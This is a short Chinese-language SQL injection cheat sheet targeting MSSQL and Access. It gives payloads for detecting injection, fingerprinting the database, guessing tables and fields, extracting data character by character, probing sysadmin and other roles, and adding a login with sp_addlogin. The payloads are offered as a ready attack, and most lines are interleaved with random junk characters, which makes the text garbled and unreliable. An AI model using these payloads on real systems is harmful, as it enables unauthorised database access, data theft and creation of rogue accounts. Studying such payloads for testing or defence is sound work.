1.判断是否有注入;and 1=1 ;and 1=2 B mq7w,L.
2.初步判断是否是mssql ;and user>0 "R-1G/
yBKkx@o#z
3.注入参数是字符'and [查询条件] and ''=' MIPmsEdBi
FyN@mX
4.搜索时没过滤参数的'and [查询条件] and '%25'=' pqPhtWi%PJ
xXl^\?HC
5.判断数据库系统 k36%n
*4
>&h#t7<
;and (select count(*) from sysobjects)>0 mssql K29]B~0%E
4C2J yP3
;and (select count(*) from msysobjects)>0 access
^|DI9G(Bs
($^XF: #5
RG=!,#X
a%>p"4WL
6.猜数据库 ;and (select Count(*) from [数据库名])>0 (q+U5Ls6
0eY$K7
U
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 *V(TNLIh;
LGq}wxq
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 EJ P##eGx
J2_D P
9.(1)猜字段的ascii值(access) T_CYSS|fX
s$e0;C!D
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 @)m H"u!(7
K1O0/2O
(2)猜字段的ascii值(mssql) |,F/_
)P\Vd #
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Wd'wL"6De
o
>bf7+D
10.测试权限结构(mssql) w~>V2u_-
}0c
Two$wL/
Ie> )U)/$
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ot P7;l
`As.1@
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- IpQ51
5-O[(b2O
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- j;eR9jI$T
[i24$UT
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- UahFs
4-efnB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
QSf{V(fs
az3rK4g
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- S/pTFlptCa
;3NA,JA#Y
;and 1=(select IS_MEMBER('db_owner'));-- )|f!}( p
1lu_<?O
-?n|kSHX
V}ZF\SG(K
11.添加mssql和系统的帐户 lqe;lWC0Z
rJK3;d? E
;exec master.dbo.sp_addlogin username;-- 6&